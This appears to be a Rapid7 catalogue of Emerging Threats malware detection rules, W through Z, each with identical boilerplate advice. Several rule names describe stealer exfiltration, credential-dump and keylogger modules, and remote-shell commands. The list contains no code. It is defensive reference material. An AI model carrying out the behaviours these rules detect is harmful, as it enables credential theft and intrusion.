Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.VBKrypt.vquj Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.VB.tdq - Fake User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vermilion Stager Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vflooder.C Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Vilsel Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Virut.BN Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Virut - GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ViSystem CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer Checkin Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer CnC Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer Download Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer Sending OS Information (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vools Variant CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vundo.OD Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Webdor.NAC Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Winshow User Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/X-Files Stealer Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Xtrat.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ymacco.AA1C Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ymacco.AA67 CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.YordanyanActiveAgent CnC Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.YordanyanActiveAgent Generic CnC Pattern

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zacom.A CnC Beacon 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32.Zbot.ivgw Downloading EXE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Config Download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Requesting PE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Requesting PE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot URI Struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zeprox.B Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/Agent.NL Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/Havex Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/TrojanDownloader.Age Download Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/Vabushky.A Malicious driver download

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WindowsEnterpriseSuite FakeAV check-in GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WindowsEnterpriseSuite FakeAV get_product_domains.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WindowsEnterpriseSuite FakeAV Reporting via POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Windows Executable Downloaded With Image Content-Type Header

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Windows Executable Sent When Remote Host Claims to Send a RAR Archive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Winsoft.E Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity (GET) M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity M2 (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity M4 (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity M5 (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Retrieving Commands

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Retrieving Task

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win.Trojan.Chewbacca connectivity check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wonton-JH Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WooSIP Downloader CnC CreateFolderOnServer

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WooSIP Downloader CnC DeleteFileOnServer

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WooSIP Downloader CnC WriteMetadataOnServer

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-cmd-shell)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-enum-driver)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-enum-folder)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-enum-process)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.Jenxcus.H User Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WORM_VOBFUS Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WORM_VOBFUS Checkin Generic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WORM_VOBFUS Requesting exe

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.Win32.Balucaf.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.Win32.Vobfus Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WRAT Dropper (TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSF/JS Downloader Jan 30 2017 M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSHRAT CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSHRAT Credential Dump Module Download Command Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSHRAT Keylogger Module Download Command Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WS/JS Downloader Mar 07 2017 M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WS/JS Downloader Mar 07 2017 M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE X2000M.Agent Checkin Jan 24 2017

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Xbagger Macro Encrypted DL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Xbagger Macro Encrypted DL Jun 13 2016

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE xCaon Embedded Encrypted Command in Webpage

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XcodeGhost CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XcodeGhost CnC M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDMonitor Checkin Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDMonitor Sending Debug Messages

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Sending File Upload Progress

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Sending Screenshot Upload Progress

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Uploading Directory Listting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Uploading Files

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE X-Files Stealer CnC Exfil Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XLS.Unk DDE rar Drop Attempt (.club)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XLS.Unk DDE rar Drop Attempt (.online)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE X-Malware-Sinkhole Header in HTTP Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE xpsecuritycenter.com Fake AntiVirus GET-Install Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XPSecurityCenter FakeAV Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Xwo CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE YAHOOYLO Stealer CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Yahoyah CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Yandexbot Request Outbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Search Open Websites/Domains - T1593

ET MALWARE Yayih.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Yayih.A Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Yayih.A Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZAccess/Sirefef/MAX++/Jorik/Smadow Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zacom/NFlog Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zacom/NFlog HTTP POST Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zacom/NFlog HTTP POST Fake UA CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Zalupko/Koceg/Mandaph HTTP Checkin (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zberp receiving config via image file - SET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot/Beomok/PSW - HTTP POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot CnC GET /lost.dat

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot CnC POST /common/timestamps.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot CnC POST /common/versions.php

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot download config

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot download config - SET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot Generic URI/Header Struct .bin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot .onion Proxy domain in SNI Aug 04 2014

Description

Recommendation

ET MALWARE Zbot POST Request to C2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot UA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zebrocy Backdoor CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zebrocy Screenshot Upload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zentom FakeAV Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zeoticus Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE ZeroAccess Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

